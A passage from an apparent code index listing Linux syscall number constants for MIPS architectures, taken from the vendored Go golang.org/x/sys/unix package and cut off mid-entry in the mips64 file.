constant SYS_CHOWN (line 211) | SYS_CHOWN = 4202 constant SYS_GETCWD (line 212) | SYS_GETCWD = 4203 constant SYS_CAPGET (line 213) | SYS_CAPGET = 4204 constant SYS_CAPSET (line 214) | SYS_CAPSET = 4205 constant SYS_SIGALTSTACK (line 215) | SYS_SIGALTSTACK = 4206 constant SYS_SENDFILE (line 216) | SYS_SENDFILE = 4207 constant SYS_GETPMSG (line 217) | SYS_GETPMSG = 4208 constant SYS_PUTPMSG (line 218) | SYS_PUTPMSG = 4209 constant SYS_MMAP2 (line 219) | SYS_MMAP2 = 4210 constant SYS_TRUNCATE64 (line 220) | SYS_TRUNCATE64 = 4211 constant SYS_FTRUNCATE64 (line 221) | SYS_FTRUNCATE64 = 4212 constant SYS_STAT64 (line 222) | SYS_STAT64 = 4213 constant SYS_LSTAT64 (line 223) | SYS_LSTAT64 = 4214 constant SYS_FSTAT64 (line 224) | SYS_FSTAT64 = 4215 constant SYS_PIVOT_ROOT (line 225) | SYS_PIVOT_ROOT = 4216 constant SYS_MINCORE (line 226) | SYS_MINCORE = 4217 constant SYS_MADVISE (line 227) | SYS_MADVISE = 4218 constant SYS_GETDENTS64 (line 228) | SYS_GETDENTS64 = 4219 constant SYS_FCNTL64 (line 229) | SYS_FCNTL64 = 4220 constant SYS_RESERVED221 (line 230) | SYS_RESERVED221 = 4221 constant SYS_GETTID (line 231) | SYS_GETTID = 4222 constant SYS_READAHEAD (line 232) | SYS_READAHEAD = 4223 constant SYS_SETXATTR (line 233) | SYS_SETXATTR = 4224 constant SYS_LSETXATTR (line 234) | SYS_LSETXATTR = 4225 constant SYS_FSETXATTR (line 235) | SYS_FSETXATTR = 4226 constant SYS_GETXATTR (line 236) | SYS_GETXATTR = 4227 constant SYS_LGETXATTR (line 237) | SYS_LGETXATTR = 4228 constant SYS_FGETXATTR (line 238) | SYS_FGETXATTR = 4229 constant SYS_LISTXATTR (line 239) | SYS_LISTXATTR = 4230 constant SYS_LLISTXATTR (line 240) | SYS_LLISTXATTR = 4231 constant SYS_FLISTXATTR (line 241) | SYS_FLISTXATTR = 4232 constant SYS_REMOVEXATTR (line 242) | SYS_REMOVEXATTR = 4233 constant SYS_LREMOVEXATTR (line 243) | SYS_LREMOVEXATTR = 4234 constant SYS_FREMOVEXATTR (line 244) | SYS_FREMOVEXATTR = 4235 constant SYS_TKILL (line 245) | SYS_TKILL = 4236 constant SYS_SENDFILE64 (line 246) | SYS_SENDFILE64 = 4237 constant SYS_FUTEX (line 247) | SYS_FUTEX = 4238 constant SYS_SCHED_SETAFFINITY (line 248) | SYS_SCHED_SETAFFINITY = 4239 constant SYS_SCHED_GETAFFINITY (line 249) | SYS_SCHED_GETAFFINITY = 4240 constant SYS_IO_SETUP (line 250) | SYS_IO_SETUP = 4241 constant SYS_IO_DESTROY (line 251) | SYS_IO_DESTROY = 4242 constant SYS_IO_GETEVENTS (line 252) | SYS_IO_GETEVENTS = 4243 constant SYS_IO_SUBMIT (line 253) | SYS_IO_SUBMIT = 4244 constant SYS_IO_CANCEL (line 254) | SYS_IO_CANCEL = 4245 constant SYS_EXIT_GROUP (line 255) | SYS_EXIT_GROUP = 4246 constant SYS_LOOKUP_DCOOKIE (line 256) | SYS_LOOKUP_DCOOKIE = 4247 constant SYS_EPOLL_CREATE (line 257) | SYS_EPOLL_CREATE = 4248 constant SYS_EPOLL_CTL (line 258) | SYS_EPOLL_CTL = 4249 constant SYS_EPOLL_WAIT (line 259) | SYS_EPOLL_WAIT = 4250 constant SYS_REMAP_FILE_PAGES (line 260) | SYS_REMAP_FILE_PAGES = 4251 constant SYS_SET_TID_ADDRESS (line 261) | SYS_SET_TID_ADDRESS = 4252 constant SYS_RESTART_SYSCALL (line 262) | SYS_RESTART_SYSCALL = 4253 constant SYS_FADVISE64 (line 263) | SYS_FADVISE64 = 4254 constant SYS_STATFS64 (line 264) | SYS_STATFS64 = 4255 constant SYS_FSTATFS64 (line 265) | SYS_FSTATFS64 = 4256 constant SYS_TIMER_CREATE (line 266) | SYS_TIMER_CREATE = 4257 constant SYS_TIMER_SETTIME (line 267) | SYS_TIMER_SETTIME = 4258 constant SYS_TIMER_GETTIME (line 268) | SYS_TIMER_GETTIME = 4259 constant SYS_TIMER_GETOVERRUN (line 269) | SYS_TIMER_GETOVERRUN = 4260 constant SYS_TIMER_DELETE (line 270) | SYS_TIMER_DELETE = 4261 constant SYS_CLOCK_SETTIME (line 271) | SYS_CLOCK_SETTIME = 4262 constant SYS_CLOCK_GETTIME (line 272) | SYS_CLOCK_GETTIME = 4263 constant SYS_CLOCK_GETRES (line 273) | SYS_CLOCK_GETRES = 4264 constant SYS_CLOCK_NANOSLEEP (line 274) | SYS_CLOCK_NANOSLEEP = 4265 constant SYS_TGKILL (line 275) | SYS_TGKILL = 4266 constant SYS_UTIMES (line 276) | SYS_UTIMES = 4267 constant SYS_MBIND (line 277) | SYS_MBIND = 4268 constant SYS_GET_MEMPOLICY (line 278) | SYS_GET_MEMPOLICY = 4269 constant SYS_SET_MEMPOLICY (line 279) | SYS_SET_MEMPOLICY = 4270 constant SYS_MQ_OPEN (line 280) | SYS_MQ_OPEN = 4271 constant SYS_MQ_UNLINK (line 281) | SYS_MQ_UNLINK = 4272 constant SYS_MQ_TIMEDSEND (line 282) | SYS_MQ_TIMEDSEND = 4273 constant SYS_MQ_TIMEDRECEIVE (line 283) | SYS_MQ_TIMEDRECEIVE = 4274 constant SYS_MQ_NOTIFY (line 284) | SYS_MQ_NOTIFY = 4275 constant SYS_MQ_GETSETATTR (line 285) | SYS_MQ_GETSETATTR = 4276 constant SYS_VSERVER (line 286) | SYS_VSERVER = 4277 constant SYS_WAITID (line 287) | SYS_WAITID = 4278 constant SYS_ADD_KEY (line 288) | SYS_ADD_KEY = 4280 constant SYS_REQUEST_KEY (line 289) | SYS_REQUEST_KEY = 4281 constant SYS_KEYCTL (line 290) | SYS_KEYCTL = 4282 constant SYS_SET_THREAD_AREA (line 291) | SYS_SET_THREAD_AREA = 4283 constant SYS_INOTIFY_INIT (line 292) | SYS_INOTIFY_INIT = 4284 constant SYS_INOTIFY_ADD_WATCH (line 293) | SYS_INOTIFY_ADD_WATCH = 4285 constant SYS_INOTIFY_RM_WATCH (line 294) | SYS_INOTIFY_RM_WATCH = 4286 constant SYS_MIGRATE_PAGES (line 295) | SYS_MIGRATE_PAGES = 4287 constant SYS_OPENAT (line 296) | SYS_OPENAT = 4288 constant SYS_MKDIRAT (line 297) | SYS_MKDIRAT = 4289 constant SYS_MKNODAT (line 298) | SYS_MKNODAT = 4290 constant SYS_FCHOWNAT (line 299) | SYS_FCHOWNAT = 4291 constant SYS_FUTIMESAT (line 300) | SYS_FUTIMESAT = 4292 constant SYS_FSTATAT64 (line 301) | SYS_FSTATAT64 = 4293 constant SYS_UNLINKAT (line 302) | SYS_UNLINKAT = 4294 constant SYS_RENAMEAT (line 303) | SYS_RENAMEAT = 4295 constant SYS_LINKAT (line 304) | SYS_LINKAT = 4296 constant SYS_SYMLINKAT (line 305) | SYS_SYMLINKAT = 4297 constant SYS_READLINKAT (line 306) | SYS_READLINKAT = 4298 constant SYS_FCHMODAT (line 307) | SYS_FCHMODAT = 4299 constant SYS_FACCESSAT (line 308) | SYS_FACCESSAT = 4300 constant SYS_PSELECT6 (line 309) | SYS_PSELECT6 = 4301 constant SYS_PPOLL (line 310) | SYS_PPOLL = 4302 constant SYS_UNSHARE (line 311) | SYS_UNSHARE = 4303 constant SYS_SPLICE (line 312) | SYS_SPLICE = 4304 constant SYS_SYNC_FILE_RANGE (line 313) | SYS_SYNC_FILE_RANGE = 4305 constant SYS_TEE (line 314) | SYS_TEE = 4306 constant SYS_VMSPLICE (line 315) | SYS_VMSPLICE = 4307 constant SYS_MOVE_PAGES (line 316) | SYS_MOVE_PAGES = 4308 constant SYS_SET_ROBUST_LIST (line 317) | SYS_SET_ROBUST_LIST = 4309 constant SYS_GET_ROBUST_LIST (line 318) | SYS_GET_ROBUST_LIST = 4310 constant SYS_KEXEC_LOAD (line 319) | SYS_KEXEC_LOAD = 4311 constant SYS_GETCPU (line 320) | SYS_GETCPU = 4312 constant SYS_EPOLL_PWAIT (line 321) | SYS_EPOLL_PWAIT = 4313 constant SYS_IOPRIO_SET (line 322) | SYS_IOPRIO_SET = 4314 constant SYS_IOPRIO_GET (line 323) | SYS_IOPRIO_GET = 4315 constant SYS_UTIMENSAT (line 324) | SYS_UTIMENSAT = 4316 constant SYS_SIGNALFD (line 325) | SYS_SIGNALFD = 4317 constant SYS_TIMERFD (line 326) | SYS_TIMERFD = 4318 constant SYS_EVENTFD (line 327) | SYS_EVENTFD = 4319 constant SYS_FALLOCATE (line 328) | SYS_FALLOCATE = 4320 constant SYS_TIMERFD_CREATE (line 329) | SYS_TIMERFD_CREATE = 4321 constant SYS_TIMERFD_GETTIME (line 330) | SYS_TIMERFD_GETTIME = 4322 constant SYS_TIMERFD_SETTIME (line 331) | SYS_TIMERFD_SETTIME = 4323 constant SYS_SIGNALFD4 (line 332) | SYS_SIGNALFD4 = 4324 constant SYS_EVENTFD2 (line 333) | SYS_EVENTFD2 = 4325 constant SYS_EPOLL_CREATE1 (line 334) | SYS_EPOLL_CREATE1 = 4326 constant SYS_DUP3 (line 335) | SYS_DUP3 = 4327 constant SYS_PIPE2 (line 336) | SYS_PIPE2 = 4328 constant SYS_INOTIFY_INIT1 (line 337) | SYS_INOTIFY_INIT1 = 4329 constant SYS_PREADV (line 338) | SYS_PREADV = 4330 constant SYS_PWRITEV (line 339) | SYS_PWRITEV = 4331 constant SYS_RT_TGSIGQUEUEINFO (line 340) | SYS_RT_TGSIGQUEUEINFO = 4332 constant SYS_PERF_EVENT_OPEN (line 341) | SYS_PERF_EVENT_OPEN = 4333 constant SYS_ACCEPT4 (line 342) | SYS_ACCEPT4 = 4334 constant SYS_RECVMMSG (line 343) | SYS_RECVMMSG = 4335 constant SYS_FANOTIFY_INIT (line 344) | SYS_FANOTIFY_INIT = 4336 constant SYS_FANOTIFY_MARK (line 345) | SYS_FANOTIFY_MARK = 4337 constant SYS_PRLIMIT64 (line 346) | SYS_PRLIMIT64 = 4338 constant SYS_NAME_TO_HANDLE_AT (line 347) | SYS_NAME_TO_HANDLE_AT = 4339 constant SYS_OPEN_BY_HANDLE_AT (line 348) | SYS_OPEN_BY_HANDLE_AT = 4340 constant SYS_CLOCK_ADJTIME (line 349) | SYS_CLOCK_ADJTIME = 4341 constant SYS_SYNCFS (line 350) | SYS_SYNCFS = 4342 constant SYS_SENDMMSG (line 351) | SYS_SENDMMSG = 4343 constant SYS_SETNS (line 352) | SYS_SETNS = 4344 constant SYS_PROCESS_VM_READV (line 353) | SYS_PROCESS_VM_READV = 4345 constant SYS_PROCESS_VM_WRITEV (line 354) | SYS_PROCESS_VM_WRITEV = 4346 constant SYS_KCMP (line 355) | SYS_KCMP = 4347 constant SYS_FINIT_MODULE (line 356) | SYS_FINIT_MODULE = 4348 constant SYS_SCHED_SETATTR (line 357) | SYS_SCHED_SETATTR = 4349 constant SYS_SCHED_GETATTR (line 358) | SYS_SCHED_GETATTR = 4350 constant SYS_RENAMEAT2 (line 359) | SYS_RENAMEAT2 = 4351 constant SYS_SECCOMP (line 360) | SYS_SECCOMP = 4352 constant SYS_GETRANDOM (line 361) | SYS_GETRANDOM = 4353 constant SYS_MEMFD_CREATE (line 362) | SYS_MEMFD_CREATE = 4354 constant SYS_BPF (line 363) | SYS_BPF = 4355 constant SYS_EXECVEAT (line 364) | SYS_EXECVEAT = 4356 constant SYS_USERFAULTFD (line 365) | SYS_USERFAULTFD = 4357 constant SYS_MEMBARRIER (line 366) | SYS_MEMBARRIER = 4358 constant SYS_MLOCK2 (line 367) | SYS_MLOCK2 = 4359 constant SYS_COPY_FILE_RANGE (line 368) | SYS_COPY_FILE_RANGE = 4360 constant SYS_PREADV2 (line 369) | SYS_PREADV2 = 4361 constant SYS_PWRITEV2 (line 370) | SYS_PWRITEV2 = 4362 constant SYS_PKEY_MPROTECT (line 371) | SYS_PKEY_MPROTECT = 4363 constant SYS_PKEY_ALLOC (line 372) | SYS_PKEY_ALLOC = 4364 constant SYS_PKEY_FREE (line 373) | SYS_PKEY_FREE = 4365 constant SYS_STATX (line 374) | SYS_STATX = 4366 constant SYS_RSEQ (line 375) | SYS_RSEQ = 4367 constant SYS_IO_PGETEVENTS (line 376) | SYS_IO_PGETEVENTS = 4368 constant SYS_SEMGET (line 377) | SYS_SEMGET = 4393 constant SYS_SEMCTL (line 378) | SYS_SEMCTL = 4394 constant SYS_SHMGET (line 379) | SYS_SHMGET = 4395 constant SYS_SHMCTL (line 380) | SYS_SHMCTL = 4396 constant SYS_SHMAT (line 381) | SYS_SHMAT = 4397 constant SYS_SHMDT (line 382) | SYS_SHMDT = 4398 constant SYS_MSGGET (line 383) | SYS_MSGGET = 4399 constant SYS_MSGSND (line 384) | SYS_MSGSND = 4400 constant SYS_MSGRCV (line 385) | SYS_MSGRCV = 4401 constant SYS_MSGCTL (line 386) | SYS_MSGCTL = 4402 constant SYS_CLOCK_GETTIME64 (line 387) | SYS_CLOCK_GETTIME64 = 4403 constant SYS_CLOCK_SETTIME64 (line 388) | SYS_CLOCK_SETTIME64 = 4404 constant SYS_CLOCK_ADJTIME64 (line 389) | SYS_CLOCK_ADJTIME64 = 4405 constant SYS_CLOCK_GETRES_TIME64 (line 390) | SYS_CLOCK_GETRES_TIME64 = 4406 constant SYS_CLOCK_NANOSLEEP_TIME64 (line 391) | SYS_CLOCK_NANOSLEEP_TIME64 = 4407 constant SYS_TIMER_GETTIME64 (line 392) | SYS_TIMER_GETTIME64 = 4408 constant SYS_TIMER_SETTIME64 (line 393) | SYS_TIMER_SETTIME64 = 4409 constant SYS_TIMERFD_GETTIME64 (line 394) | SYS_TIMERFD_GETTIME64 = 4410 constant SYS_TIMERFD_SETTIME64 (line 395) | SYS_TIMERFD_SETTIME64 = 4411 constant SYS_UTIMENSAT_TIME64 (line 396) | SYS_UTIMENSAT_TIME64 = 4412 constant SYS_PSELECT6_TIME64 (line 397) | SYS_PSELECT6_TIME64 = 4413 constant SYS_PPOLL_TIME64 (line 398) | SYS_PPOLL_TIME64 = 4414 constant SYS_IO_PGETEVENTS_TIME64 (line 399) | SYS_IO_PGETEVENTS_TIME64 = 4416 constant SYS_RECVMMSG_TIME64 (line 400) | SYS_RECVMMSG_TIME64 = 4417 constant SYS_MQ_TIMEDSEND_TIME64 (line 401) | SYS_MQ_TIMEDSEND_TIME64 = 4418 constant SYS_MQ_TIMEDRECEIVE_TIME64 (line 402) | SYS_MQ_TIMEDRECEIVE_TIME64 = 4419 constant SYS_SEMTIMEDOP_TIME64 (line 403) | SYS_SEMTIMEDOP_TIME64 = 4420 constant SYS_RT_SIGTIMEDWAIT_TIME64 (line 404) | SYS_RT_SIGTIMEDWAIT_TIME64 = 4421 constant SYS_FUTEX_TIME64 (line 405) | SYS_FUTEX_TIME64 = 4422 constant SYS_SCHED_RR_GET_INTERVAL_TIME64 (line 406) | SYS_SCHED_RR_GET_INTERVAL_TIME64 = 4423 constant SYS_PIDFD_SEND_SIGNAL (line 407) | SYS_PIDFD_SEND_SIGNAL = 4424 constant SYS_IO_URING_SETUP (line 408) | SYS_IO_URING_SETUP = 4425 constant SYS_IO_URING_ENTER (line 409) | SYS_IO_URING_ENTER = 4426 constant SYS_IO_URING_REGISTER (line 410) | SYS_IO_URING_REGISTER = 4427 constant SYS_OPEN_TREE (line 411) | SYS_OPEN_TREE = 4428 constant SYS_MOVE_MOUNT (line 412) | SYS_MOVE_MOUNT = 4429 constant SYS_FSOPEN (line 413) | SYS_FSOPEN = 4430 constant SYS_FSCONFIG (line 414) | SYS_FSCONFIG = 4431 constant SYS_FSMOUNT (line 415) | SYS_FSMOUNT = 4432 constant SYS_FSPICK (line 416) | SYS_FSPICK = 4433 constant SYS_PIDFD_OPEN (line 417) | SYS_PIDFD_OPEN = 4434 constant SYS_CLONE3 (line 418) | SYS_CLONE3 = 4435 constant SYS_CLOSE_RANGE (line 419) | SYS_CLOSE_RANGE = 4436 constant SYS_OPENAT2 (line 420) | SYS_OPENAT2 = 4437 constant SYS_PIDFD_GETFD (line 421) | SYS_PIDFD_GETFD = 4438 constant SYS_FACCESSAT2 (line 422) | SYS_FACCESSAT2 = 4439 constant SYS_PROCESS_MADVISE (line 423) | SYS_PROCESS_MADVISE = 4440 constant SYS_EPOLL_PWAIT2 (line 424) | SYS_EPOLL_PWAIT2 = 4441 constant SYS_MOUNT_SETATTR (line 425) | SYS_MOUNT_SETATTR = 4442 constant SYS_QUOTACTL_FD (line 426) | SYS_QUOTACTL_FD = 4443 constant SYS_LANDLOCK_CREATE_RULESET (line 427) | SYS_LANDLOCK_CREATE_RULESET = 4444 constant SYS_LANDLOCK_ADD_RULE (line 428) | SYS_LANDLOCK_ADD_RULE = 4445 constant SYS_LANDLOCK_RESTRICT_SELF (line 429) | SYS_LANDLOCK_RESTRICT_SELF = 4446 constant SYS_PROCESS_MRELEASE (line 430) | SYS_PROCESS_MRELEASE = 4448 constant SYS_FUTEX_WAITV (line 431) | SYS_FUTEX_WAITV = 4449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 432) | SYS_SET_MEMPOLICY_HOME_NODE = 4450 constant SYS_CACHESTAT (line 433) | SYS_CACHESTAT = 4451 constant SYS_FCHMODAT2 (line 434) | SYS_FCHMODAT2 = 4452 constant SYS_MAP_SHADOW_STACK (line 435) | SYS_MAP_SHADOW_STACK = 4453 constant SYS_FUTEX_WAKE (line 436) | SYS_FUTEX_WAKE = 4454 constant SYS_FUTEX_WAIT (line 437) | SYS_FUTEX_WAIT = 4455 constant SYS_FUTEX_REQUEUE (line 438) | SYS_FUTEX_REQUEUE = 4456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_mips64.go constant SYS_READ (line 9) | SYS_READ = 5000 constant SYS_WRITE (line 10) | SYS_WRITE = 5001 constant SYS_OPEN (line 11) | SYS_OPEN = 5002 constant SYS_CLOSE (line 12) | SYS_CLOSE = 5003 constant SYS_STAT (line 13) | SYS_STAT = 5004 constant SYS_FSTAT (line 14) | SYS_FSTAT = 5005 constant SYS_LSTAT (line 15) | SYS_LSTAT = 5006 constant SYS_POLL (line 16) | SYS_POLL = 5007 constant SYS_LSEEK (line 17) | SYS_LSEEK = 5008 constant SYS_MMAP (line 18) | SYS_MMAP = 5009 constant SYS_MPROTECT (line 19) | SYS_MPROTECT = 5010 constant SYS_MUNMAP (line 20) | SYS_MUNMAP = 5011 constant SYS_BRK (line 21) | SYS_BRK = 5012 constant SYS_RT_SIGACTION (line 22) | SYS_RT_SIGACTION = 5013 constant SYS_RT_SIGPROCMASK (line 23) | SYS_RT_SIGPROCMASK = 5014 constant SYS_IOCTL (line 24) | SYS_IOCTL = 5015 constant SYS_PREAD64 (line 25) | SYS_PREAD64 = 5016 constant SYS_PWRITE64 (line 26) | SYS_PWRITE64 = 5017 constant SYS_READV (line 27) | SYS_READV = 5018 constant SYS_WRITEV (line 28) | SYS_WRITEV = 5019 constant SYS_ACCESS (line 29) | SYS_ACCESS = 5020 constant SYS_PIPE (line 30) | SYS_PIPE = 5021 constant SYS__NEWSELECT (line 31) | SYS__NEWSELECT = 5022 constant SYS_SCHED_YIELD (line 32) | SYS_SCHED_YIELD = 5023 constant SYS_MREMAP (line 33) | SYS_MREMAP = 5024 constant SYS_MSYNC (line 34) | SYS_MSYNC = 5025 constant SYS_MINCORE (line 35) | SYS_MINCORE = 5026 constant SYS_MADVISE (line 36) | SYS_MADVISE = 5027 constant SYS_SHMGET (line 37) | SYS_SHMGET = 5028 constant SYS_SHMAT (line 38) | SYS_SHMAT = 5029 constant SYS_SHMCTL (line 39) | SYS_SHMCTL = 5030 constant SYS_DUP (line 40) | SYS_DUP = 5031 constant SYS_DUP2 (line 41) | SYS_DUP2 = 5032 constant SYS_PAUSE (line 42) | SYS_PAUSE = 5033 constant SYS_NANOSLEEP (line 43) | SYS_NANOSLEEP = 5034 constant SYS_GETITIMER (line 44) | SYS_GETITIMER = 5035 constant SYS_SETITIMER (line 45) | SYS_SETITIMER = 5036 constant SYS_ALARM (line 46) | SYS_ALARM = 5037 constant SYS_GETPID (line 47) | SYS_GETPID = 5038 constant SYS_SENDFILE (line 48) | SYS_SENDFILE = 5039 constant SYS_SOCKET (line 49) | SYS_SOCKET = 5040 constant SYS_CONNECT (line 50) | SYS_CONNECT = 5041 constant SYS_ACCEPT (line 51) | SYS_ACCEPT = 5042 constant SYS_SENDTO (line 52) | SYS_SENDTO = 5043 constant SYS_RECVFROM (line 53) | SYS_RECVFROM = 5044 constant SYS_SENDMSG (line 54) | SYS_SENDMSG = 5045 constant SYS_RECVMSG (line 55) | SYS_RECVMSG = 5046 constant SYS_SHUTDOWN (line 56) | SYS_SHUTDOWN = 5047 constant SYS_BIND (line 57) | SYS_BIND = 5048 constant SYS_LISTEN (line 58) | SYS_LISTEN = 5049 constant SYS_GETSOCKNAME (line 59) | SYS_GETSOCKNAME = 5050 constant SYS_GETPEERNAME (line 60) | SYS_GETPEERNAME = 5051 constant SYS_SOCKETPAIR (line 61) | SYS_SOCKETPAIR = 5052 constant SYS_SETSOCKOPT (line 62) | SYS_SETSOCKOPT = 5053 constant SYS_GETSOCKOPT (line 63) | SYS_GETSOCKOPT = 5054 constant SYS_CLONE (line 64) | SYS_CLONE = 5055 constant SYS_FORK (line 65) | SYS_FORK = 5056 constant SYS_EXECVE (line 66) | SYS_EXECVE = 5057 constant SYS_EXIT (line 67) | SYS_EXIT = 5058 constant SYS_WAIT4 (line 68) | SYS_WAIT4 = 5059 constant SYS_KILL (line 69) | SYS_KILL = 5060 constant SYS_UNAME (line 70) | SYS_UNAME = 5061 constant SYS_SEMGET (line 71) | SYS_SEMGET = 5062 constant SYS_SEMOP (line 72) | SYS_SEMOP = 5063 constant SYS_SEMCTL (line 73) | SYS_SEMCTL = 5064 constant SYS_SHMDT (line 74) | SYS_SHMDT = 5065 constant SYS_MSGGET (line 75) | SYS_MSGGET = 5066 constant SYS_MSGSND (line 76) | SYS_MSGSND = 5067 constant SYS_MSGRCV (line 77) | SYS_MSGRCV = 5068 constant SYS_MSGCTL (line 78) | SYS_MSGCTL = 5069 constant SYS_FCNTL (line 79) | SYS_FCNTL = 5070 constant SYS_FLOCK (line 80) | SYS_FLOCK = 5071 constant SYS_FSYNC (line 81) | SYS_FSYNC = 5072 constant SYS_FDATASYNC (line 82) | SYS_FDATASYNC = 5073 constant SYS_TRUNCATE (line 83) | SYS_TRUNCATE = 5074 constant SYS_FTRUNCATE (line 84) | SYS_FTRUNCATE = 5075 constant SYS_GETDENTS (line 85) | SYS_GETDENTS = 5076 constant SYS_GETCWD (line 86) | SYS_GETCWD = 5077 constant SYS_CHDIR (line 87) | SYS_CHDIR = 5078 constant SYS_FCHDIR (line 88) | SYS_FCHDIR = 5079 constant SYS_RENAME (line 89) | SYS_RENAME = 5080 constant SYS_MKDIR (line 90) | SYS_MKDIR = 5081 constant SYS_RMDIR (line 91) | SYS_RMDIR = 5082 constant SYS_CREAT (line 92) | SYS_CREAT = 5083 constant SYS_LINK (line 93) | SYS_LINK = 5084 constant SYS_UNLINK (line 94) | SYS_UNLINK = 5085 constant SYS_SYMLINK (line 95) | SYS_SYMLINK = 5086 constant SYS_READLINK (line 96) | SYS_READLINK = 5087 constant SYS_CHMOD (line 97) | SYS_CHMOD = 5088 constant SYS_FCHMOD (line 98) | SYS_FCHMOD = 5089 constant SYS_CHOWN (line 99) | SYS_CHOWN = 5090 constant SYS_FCHOWN (line 100) | SYS_FCHOWN = 5091 constant SYS_LCHOWN (line 101) | SYS_LCHOWN = 5092 constant SYS_UMASK (line 102) | SYS_UMASK = 5093 constant SYS_GETTIMEOFDAY (line 103) | SYS_GETTIMEOFDAY = 5094 constant SYS_GETRLIMIT (line 104) | SYS_GETRLIMIT = 5095 constant SYS_GETRUSAGE (line 105) | SYS_GETRUSAGE = 5096 constant SYS_SYSINFO (line 106) | SYS_SYSINFO = 5097 constant SYS_TIMES (line 107) | SYS_TIMES = 5098 constant SYS_PTRACE (line 108) | SYS_PTRACE = 5099 constant SYS_GETUID (line 109) | SYS_GETUID = 5100 constant SYS_SYSLOG (line 110) | SYS_SYSLOG = 5101 constant SYS_GETGID (line 111) | SYS_GETGID = 5102 constant SYS_SETUID (line 112) | SYS_SETUID = 5103 constant SYS_SETGID (line 113) | SYS_SETGID = 5104 constant SYS_GETEUID (line 114) | SYS_GETEUID = 5105 constant SYS_GETEGID (line 115) | SYS_GETEGID = 5106 constant SYS_SETPGID (line 116) | SYS_SETPGID = 5107 constant SYS_GETPPID (line 117) | SYS_GETPPID = 5108 constant SYS_GETPGRP (line 118) | SYS_GETPGRP = 5109 constant SYS_SETSID (line 119) | SYS_SETSID = 5110 constant SYS_SETREUID (line 120) | SYS_SETREUID = 5111 constant SYS_SETREGID (line 121) | SYS_SETREGID = 5112 constant SYS_GETGROUPS (line 122) | SYS_GETGROUPS = 5113 constant SYS_SETGROUPS (line 123) | SYS_SETGROUPS = 5114 constant SYS_SETRESUID (line 124) | SYS_SETRESUID = 5115 constant SYS_GETRESUID (line 125) | SYS_GETRESUID = 5116 constant SYS_SETRESGID (line 126) | SYS_SETRESGID = 5117 constant SYS_GETRESGID (line 127) | SYS_GETRESGID = 5118 constant SYS_GETPGID (line 128) | SYS_GETPGID = 5119 constant SYS_SETFSUID (line 129) | SYS_SETFSUID = 5120 constant SYS_SETFSGID (line 130) | SYS_SETFSGID = 5121 constant SYS_GETSID (line 131) | SYS_GETSID = 5122 constant SYS_CAPGET (line 132) | SYS_CAPGET = 5123 constant SYS_CAPSET (line 133) | SYS_CAPSET = 5124 constant SYS_RT_SIGPENDING (line 134) | SYS_RT_SIGPENDING = 5125 constant SYS_RT_SIGTIMEDWAIT (line 135) | SYS_RT_SIGTIMEDWAIT = 5126 constant SYS_RT_SIGQUEUEINFO (line 136) | SYS_RT_SIGQUEUEINFO = 5127 constant SYS_RT_SIGSUSPEND (line 137) | SYS_RT_SIGSUSPEND = 5128 constant SYS_SIGALTSTACK (line 138) | SYS_SIGALTSTACK = 5129 constant SYS_UTIME (line 139) | SYS_UTIME = 5130 constant SYS_MKNOD (line 140) | SYS_MKNOD = 5131 constant SYS_PERSONALITY (line 141) | SYS_PERSONALITY = 5132 constant SYS_USTAT (line 142) | SYS_USTAT = 5133 constant SYS_STATFS (line 143) | SYS_STATFS = 5134 constant SYS_FSTATFS (line 144) | SYS_FSTATFS = 5135 constant SYS_SYSFS (line 145) | SYS_SYSFS = 5136 constant SYS_GETPRIORITY (line 146) | SYS_GETPRIORITY = 5137 constant SYS_SETPRIORITY (line 147) | SYS_SETPRIORITY = 5138 constant SYS_SCHED_SETPARAM (line 148) | SYS_SCHED_SETPARAM = 5139 constant SYS_SCHED_GETPARAM (line 149) | SYS_SCHED_GETPARAM = 5140 constant SYS_SCHED_SETSCHEDULER (line 150) | SYS_SCHED_SETSCHEDULER = 5141 constant SYS_SCHED_GETSCHEDULER (line 151) | SYS_SCHED_GETSCHEDULER = 5142 constant SYS_SCHED_GET_PRIORITY_MAX (line 152) | SYS_SCHED_GET_PRIORITY_MAX = 5143 constant SYS_SCHED_GET_PRIORITY_MIN (line 153) | SYS_SCHED_GET_PRIORITY_MIN = 5144 constant SYS_SCHED_RR_GET_INTERVAL (line 154) | SYS_SCHED_RR_GET_INTERVAL = 5145 constant SYS_MLOCK (line 155) | SYS_MLOCK = 5146 constant SYS_MUNLOCK (line 156) | SYS_MUNLOCK = 5147 constant SYS_MLOCKALL (line 157) | SYS_MLOCKALL = 5148 constant SYS_MUNLOCKALL (line 158) | SYS_MUNLOCKALL = 5149 constant SYS_VHANGUP (line 159) | SYS_VHANGUP = 5150 constant SYS_PIVOT_ROOT (line 160) | SYS_PIVOT_ROOT = 5151 constant SYS__SYSCTL (line 161) | SYS__SYSCTL = 5152 constant SYS_PRCTL (line 162) | SYS_PRCTL = 5153 constant SYS_ADJTIMEX (line 163) | SYS_ADJTIMEX = 5154 constant SYS_SETRLIMIT (line 164) | SYS_SETRLIMIT = 5155 constant SYS_CHROOT (line 165) | SYS_CHROOT = 5156 constant SYS_SYNC (line 166) | SYS_SYNC = 5157 constant SYS_ACCT (line 167) | SYS_ACCT = 5158 constant SYS_SETTIMEOFDAY (line 168) | SYS_SETTIMEOFDAY = 5159 constant SYS_MOUNT (line 169) | SYS_MOUNT = 5160 constant SYS_UMOUNT2 (line 170) | SYS_UMOUNT2 = 5161 constant SYS_SWAPON (line 171) | SYS_SWAPON = 5162 constant SYS_SWAPOFF (line 172) | SYS_SWAPOFF = 5163 constant SYS_REBOOT (line 173) | SYS_REBOOT = 5164 constant SYS_SETHOSTNAME (line 174) | SYS_SETHOSTNAME = 5165 constant SYS_SETDOMAINNAME (line 175) | SYS_SETDOMAINNAME = 5166 constant SYS_CREATE_MODULE (line 176) | SYS_CREATE_MODULE = 5167 constant SYS_INIT_MODULE (line 177) | SYS_INIT_MODULE = 5168 constant SYS_DELETE_MODULE (line 178) | SYS_DELETE_MODULE = 5169 constant SYS_GET_KERNEL_SYMS (line 179) | SYS_GET_KERNEL_SYMS = 5170 constant SYS_QUERY_MODULE (line 180) | SYS_QUERY_MODULE = 5171 constant SYS_QUOTACTL (line 181) | SYS_QUOTACTL = 5172 constant SYS_NFSSERVCTL (line 182) | SYS_NFSSERVCTL = 5173 constant SYS_GETPMSG (line 183) | SYS_GETPMSG = 5174 constant SYS_PUTPMSG (line 184) | SYS_PUTPMSG = 5175 constant SYS_AFS_SYSCALL (line 185) | SYS_AFS_SYSCALL = 5176 constant SYS_RESERVED177 (line 186) | 